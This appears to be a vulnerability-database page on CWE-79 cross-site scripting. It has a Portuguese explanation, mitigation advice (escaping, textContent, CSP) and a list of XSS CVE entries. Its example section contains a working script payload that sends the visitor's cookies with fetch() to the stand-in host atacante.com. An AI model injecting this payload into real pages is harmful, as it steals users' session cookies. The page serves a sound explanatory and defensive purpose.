Fallos del tipo CWE-79

28.573 resultados

Injeção de Script entre Sites (XSS)

Ocorre quando uma aplicação web insere dados não validados ou não escapados diretamente em páginas HTML, permitindo que um atacante injete código JavaScript malicioso. Esse script é executado no navegador da vítima, roubando cookies, tokens de autenticação ou realizando ações em nome do usuário.

Ejemplo

Um site de comentários que exibe a entrada do usuário sem sanitização: se alguém escreve <script>fetch('http://atacante.com/?cookie='+document.cookie)</script> como comentário, o navegador de quem visualiza executa o script e envia seus cookies para o atacante.

Cómo mitigar

Sempre escapar (ou codificar em HTML) dados vindos do usuário antes de renderizar: use funções como htmlspecialchars() em PHP, textContent ao invés de innerHTML em JavaScript, ou use templates que escapam por padrão (como Jinja2, Vue com v-text). Implemente Content Security Policy (CSP) como camada adicional de defesa.

CVE-2023-47115HIGHLabel Studio XSS Vulnerability on Avatar UploadEPSS 1.4%CVE-2016-9126—Revive Adserver before 3.2.3 suffers from persistent XSS. Usernames are not properly escaped when displayed in the audit trail widget of theEPSS 1.4%CVE-2023-22849MEDIUMApache Sling App CMS: XSS in CMS Reference / UI ComponentsEPSS 1.4%CVE-2021-25104—Ocean Extra < 1.9.5 - Reflected Cross-Site ScriptingEPSS 1.4%CVE-2016-10547—Nunjucks is a full featured templating engine for JavaScript. Versions 2.4.2 and lower have a cross site scripting (XSS) vulnerability in auEPSS 1.4%CVE-2021-24956—Blog2Social < 6.8.7 - Reflected Cross-Site ScriptingEPSS 1.4%CVE-2021-24940—Persian Woocommerce <= 5.8.0 - Reflected Cross-Site ScriptingEPSS 1.4%CVE-2022-0599—Mapping Multiple URLs Redirect Same Page <= 5.8 - Reflected Cross-Site ScriptingEPSS 1.4%CVE-2022-0509MEDIUMCross-site Scripting (XSS) - Stored in pimcore/pimcoreEPSS 1.4%CVE-2024-36038MEDIUMStored XSSEPSS 1.4%CVE-2023-3990LOWMingsoft MCMS HTTP POST Request search.do cross site scriptingEPSS 1.4%CVE-2024-12641CRITICALChunghwa Telecom TenderDocTransfer - Reflected Cross-site Scripting to RCEEPSS 1.4%CVE-2018-3769—ruby-grape ruby gem suffers from a cross-site scripting (XSS) vulnerability via "format" parameter.EPSS 1.4%CVE-2023-1031HIGHMonicaHQ version 4.0.0 allows an authenticated remote attacker to execute malicious code in the application via CSTI in the `settings` endpoEPSS 1.4%CVE-2023-4136HIGHImproper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in Crafter EngineEPSS 1.4%CVE-2023-26843MEDIUMA stored Cross-site scripting (XSS) vulnerability in ChurchCRM 4.5.3 allows remote attackers to inject arbitrary web script or HTML via the EPSS 1.4%CVE-2021-24807—Support Board < 3.3.5 - Agent+ Stored Cross-Site ScriptingEPSS 1.4%CVE-2022-0268MEDIUMCross-site Scripting (XSS) - Stored in getgrav/gravEPSS 1.4%CVE-2022-43015MEDIUMOpenCATS v0.9.6 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the entriesPerPage parameter.EPSS 1.4%CVE-2022-43014MEDIUMOpenCATS v0.9.6 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the joborderID parameter.EPSS 1.4%